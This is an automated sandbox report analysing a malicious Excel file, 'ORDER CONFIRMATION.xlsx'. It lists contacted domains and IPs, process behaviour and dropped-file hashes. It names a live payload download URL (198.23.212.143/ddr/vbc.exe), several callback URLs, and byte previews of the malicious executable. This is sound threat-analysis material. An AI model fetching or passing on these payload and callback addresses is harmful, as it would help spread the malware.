                                                              http://www.hanlansmojitovillage.net/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ==false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              www.hanlansmojitovillage.net/nthe/true
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://www.onpar-golf.com/nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5Pfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://198.23.212.143/ddr/vbc.exetrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.thaysay.net/nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5Pfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              http://www.windows.com/pctv.explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                		high
                                                                http://investor.msn.comexplorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                  		high
                                                                  http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                    		high
                                                                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.hotmail.com/oeexplorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                      		high
                                                                      http://treyresearch.netexplorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpfalse
                                                                        		high
                                                                        http://java.sun.comexplorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.icra.org/vocabulary/.explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000009.00000000.483450971.0000000001BE0000.00000002.00020000.sdmpfalse
                                                                          		high
                                                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000009.00000000.487570517.000000000447A000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.day.com/dam/1.0CFE3BF36.emf.0.drfalse
                                                                              		high
                                                                              http://investor.msn.com/explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                                		high
                                                                                http://www.piriform.com/ccleanerexplorer.exe, 00000009.00000000.503345454.00000000044E7000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://computername/printers/printername/.printerexplorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		low
                                                                                  http://www.%s.comPAexplorer.exe, 00000009.00000000.483450971.0000000001BE0000.00000002.00020000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		low
                                                                                  http://www.autoitscript.com/autoit3explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpfalse
                                                                                    		high
                                                                                    https://support.mozilla.orgexplorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpfalse
                                                                                      		high
                                                                                      http://servername/isapibackend.dllexplorer.exe, 00000009.00000000.486663706.0000000003E50000.00000002.00020000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		low
                                                                                      https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnotipconfig.exe, 0000000B.00000002.688497436.00000000026B2000.00000004.00020000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown

                                                                                      Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      198.23.212.143
                                                                                      		unknownUnited States
                                                                                      		36352AS-COLOCROSSINGUStrue
                                                                                      34.102.136.180
                                                                                      		plasticplank.comUnited States
                                                                                      		15169GOOGLEUSfalse
                                                                                      34.98.99.30
                                                                                      		realstyleworks.comUnited States
                                                                                      		15169GOOGLEUSfalse
                                                                                      192.99.131.252
                                                                                      		americanstonesusa.comCanada
                                                                                      		16276OVHFRtrue

                                                                                      General Information

                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                      Analysis ID:483668
                                                                                      Start date:15.09.2021
                                                                                      Start time:11:15:16
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 17m 57s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Sample file name:ORDER CONFIRMATION.xlsx
                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                      Number of analysed new started processes analysed:12
                                                                                      Number of new started drivers analysed:2
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.expl.evad.winXLSX@12/19@22/4
                                                                                      EGA Information:Failed
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 23.7% (good quality ratio 22.8%)
                                                                                      • Quality average: 69.8%
                                                                                      • Quality standard deviation: 28.9%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 97%
                                                                                      • Number of executed functions: 90
                                                                                      • Number of non-executed functions: 56
                                                                                      Cookbook Comments:
                                                                                      • Adjust boot time
                                                                                      • Enable AMSI
                                                                                      • Found application associated with file extension: .xlsx
                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                      • Attach to Office via COM
                                                                                      • Scroll down
                                                                                      • Close Viewer
                                                                                      Warnings:
                                                                                      Show All
                                                                                      • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      11:15:46API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                                                                                      11:15:48API Interceptor125x Sleep call for process: vbc.exe modified
                                                                                      11:16:22API Interceptor229x Sleep call for process: ipconfig.exe modified
                                                                                      11:17:11API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      198.23.212.143ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                                                      • 198.23.212.143/restore/vbc.exe
                                                                                      VINASHIP STAR.xlsxGet hashmaliciousBrowse
                                                                                      • 198.23.212.143/hkcmd/vbc.exe
                                                                                      MV NORDSPRING.xlsxGet hashmaliciousBrowse
                                                                                      • 198.23.212.143/ibm/vbc.exe
                                                                                      192.99.131.252UiUIvFRxA8.exeGet hashmaliciousBrowse
                                                                                      • www.americanstonesusa.com/nthe/?pF=TiWkgH4RkF7GI6/xmtcRQySnot/hSP0U84AJ42MHKZz+hx9kgl2ssvJW7++40TiQRwdDqjcF6A==&OZU=kh_XEVoH4
                                                                                      IDol28opjZ.exeGet hashmaliciousBrowse
                                                                                      • www.americanstonesusa.com/nthe/?Uzrhst=U4UTr&JBth_0D=TiWkgH4RkF7GI6/xmtcRQySnot/hSP0U84AJ42MHKZz+hx9kgl2ssvJW79Sooi+rWF0S

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      www.aedenpure.comQYUNlRkkn1.exeGet hashmaliciousBrowse
                                                                                      • 217.160.0.177
                                                                                      www.tomrings.comSKMBT69150632L.exeGet hashmaliciousBrowse
                                                                                      • 162.0.214.58
                                                                                      New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                      • 162.0.214.58
                                                                                      statement.exeGet hashmaliciousBrowse
                                                                                      • 162.0.214.58
                                                                                      Ohki Blower Skid Base Enquiry 052521.exeGet hashmaliciousBrowse
                                                                                      • 162.0.214.58
                                                                                      Wire Payment Of $35,276.70.exeGet hashmaliciousBrowse
                                                                                      • 162.0.214.58
                                                                                      cname.landingi.com0OBKA8AwTn.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      ZbpMqzUXVN.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      PO_IMG_13072021_item.exeGet hashmaliciousBrowse
                                                                                      • 52.212.68.12
                                                                                      47mAsp9IER.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      U03c2doc.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      scan-copy059950059pdf.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      Descripciones de oferta de productos MACIILIAS SRL doc.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      a449cc12_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                      • 52.212.68.12
                                                                                      Dokument Nota odbiorcza IMI FFPT-2019223912003_2021 doc.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      Documento de transfer#U00eancia banc#U00e1ria _2021doc.exeGet hashmaliciousBrowse
                                                                                      • 52.212.68.12
                                                                                      TSVINCCU21021642.exeGet hashmaliciousBrowse
                                                                                      • 52.212.68.12
                                                                                      SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      Paymonth invoice.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      Product list.xlsxGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      WaybillDoc_6848889025.xlsxGet hashmaliciousBrowse
                                                                                      • 108.128.238.226

                                                                                      ASN

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      AS-COLOCROSSINGUSPedido.xlsxGet hashmaliciousBrowse
                                                                                      • 172.245.26.190
                                                                                      #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsxGet hashmaliciousBrowse
                                                                                      • 23.95.85.181
                                                                                      09142021_PDF.vbsGet hashmaliciousBrowse
                                                                                      • 23.94.82.41
                                                                                      Swift Mt103.xlsxGet hashmaliciousBrowse
                                                                                      • 23.95.13.175
                                                                                      vkb.xlsxGet hashmaliciousBrowse
                                                                                      • 192.3.13.11
                                                                                      Transfer Swift.xlsxGet hashmaliciousBrowse
                                                                                      • 172.245.26.190
                                                                                      ORDER 5172020.xlsxGet hashmaliciousBrowse
                                                                                      • 198.12.84.109
                                                                                      REF_MIDLGB34.xlsxGet hashmaliciousBrowse
                                                                                      • 23.94.159.208
                                                                                      proforma invoice.xlsxGet hashmaliciousBrowse
                                                                                      • 192.3.141.149
                                                                                      Swift_Mt103.xlsxGet hashmaliciousBrowse
                                                                                      • 23.95.13.175
                                                                                      PO-80722 .xlsxGet hashmaliciousBrowse
                                                                                      • 198.12.84.109
                                                                                      MT103-Swift Copy.xlsxGet hashmaliciousBrowse
                                                                                      • 198.46.199.203
                                                                                      Items_quote.xlsxGet hashmaliciousBrowse
                                                                                      • 172.245.26.145
                                                                                      Usd_transfer.xlsxGet hashmaliciousBrowse
                                                                                      • 172.245.26.145
                                                                                      REF_MIDLGB34.xlsxGet hashmaliciousBrowse
                                                                                      • 23.94.159.208
                                                                                      ORDER RFQ1009202.xlsxGet hashmaliciousBrowse
                                                                                      • 23.95.85.181
                                                                                      msn.xlsxGet hashmaliciousBrowse
                                                                                      • 198.12.127.217
                                                                                      swift.xlsxGet hashmaliciousBrowse
                                                                                      • 198.46.199.171
                                                                                      Additional Order Qty 197.xlsxGet hashmaliciousBrowse
                                                                                      • 198.12.107.117
                                                                                      DHL Cargo Arrival.xlsxGet hashmaliciousBrowse
                                                                                      • 172.245.26.190
                                                                                      OVHFRqy2t7MIRoi.exeGet hashmaliciousBrowse
                                                                                      • 92.222.145.236
                                                                                      ORDER 5172020.xlsxGet hashmaliciousBrowse
                                                                                      • 144.217.61.66
                                                                                      zB34E25PZM.exeGet hashmaliciousBrowse
                                                                                      • 87.98.185.184
                                                                                      USD INV#1191189.xlsxGet hashmaliciousBrowse
                                                                                      • 213.186.33.5
                                                                                      mipsGet hashmaliciousBrowse
                                                                                      • 54.37.203.235
                                                                                      lEsEX3McwH.exeGet hashmaliciousBrowse
                                                                                      • 51.254.69.209
                                                                                      5cv9ajEWlIGet hashmaliciousBrowse
                                                                                      • 51.79.103.19
                                                                                      oAQ0OaThsMGet hashmaliciousBrowse
                                                                                      • 213.251.181.247
                                                                                      ORDER 5172020.xlsxGet hashmaliciousBrowse
                                                                                      • 144.217.61.66
                                                                                      New_PO0056329.xlsxGet hashmaliciousBrowse
                                                                                      • 164.132.216.38
                                                                                      Z9GkJvygEk.exeGet hashmaliciousBrowse
                                                                                      • 149.56.94.218
                                                                                      RZAcKBlQo0.exeGet hashmaliciousBrowse
                                                                                      • 51.89.143.152
                                                                                      F1MwWrwBR7.exeGet hashmaliciousBrowse
                                                                                      • 51.89.143.157
                                                                                      Ernest_Skye_Mitchell.htmlGet hashmaliciousBrowse
                                                                                      • 167.114.119.127
                                                                                      mDkCoW1yzV.exeGet hashmaliciousBrowse
                                                                                      • 51.89.96.41
                                                                                      Payment voucher. pdf.................gz.exeGet hashmaliciousBrowse
                                                                                      • 51.222.134.241
                                                                                      5siADx4Pdz.exeGet hashmaliciousBrowse
                                                                                      • 51.89.96.41
                                                                                      9e5SOQ1wPzGet hashmaliciousBrowse
                                                                                      • 139.99.135.131
                                                                                      7LqDcyRJiNGet hashmaliciousBrowse
                                                                                      • 139.99.135.131
                                                                                      EEU2sTtvahGet hashmaliciousBrowse
                                                                                      • 139.99.135.131

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:downloaded
                                                                                      Size (bytes):556544
                                                                                      Entropy (8bit):7.182791197610268
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:7WHCM2K4Cz8liFBdgtM6lf2vo45Rm5fv1zCln:h3CzeiDdIMAfEofftzk
                                                                                      MD5:989933E361010648C467C6D7B6C2D812
                                                                                      SHA1:3BD47D097B8CD69083445EB0417B0059FA806542
                                                                                      SHA-256:34A89EDA5DD4AEF3EFB096011F27BBA7354B4C624D5DC01F4B43A18AC42D6AF4
                                                                                      SHA-512:F98B8337F527B49A4E5BD659CD6264D22F43C31EAAB55CCA4BF79EE2C5C5405D5CD78D1176759A0E0287E5FEB82675EF0D73DDA918FB9289ACC9D84DA466C60F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:low
                                                                                      IE Cache URL:http://198.23.212.143/ddr/vbc.exe
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6...............0..t.............. ........@.. ....................................@.................................x...O...................................\................................................ ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B........................H........?..._......o...................................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C03C88C.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):8815
                                                                                      Entropy (8bit):7.944898651451431
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24B64F4E.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):84203
                                                                                      Entropy (8bit):7.979766688932294
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                      MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F791AF7.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D4B1A7A.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):49744
                                                                                      Entropy (8bit):7.99056926749243
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EA9D4E2.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):14198
                                                                                      Entropy (8bit):7.916688725116637
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                      MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                      SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                      SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                      SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CBE2925.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):8815
                                                                                      Entropy (8bit):7.944898651451431
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
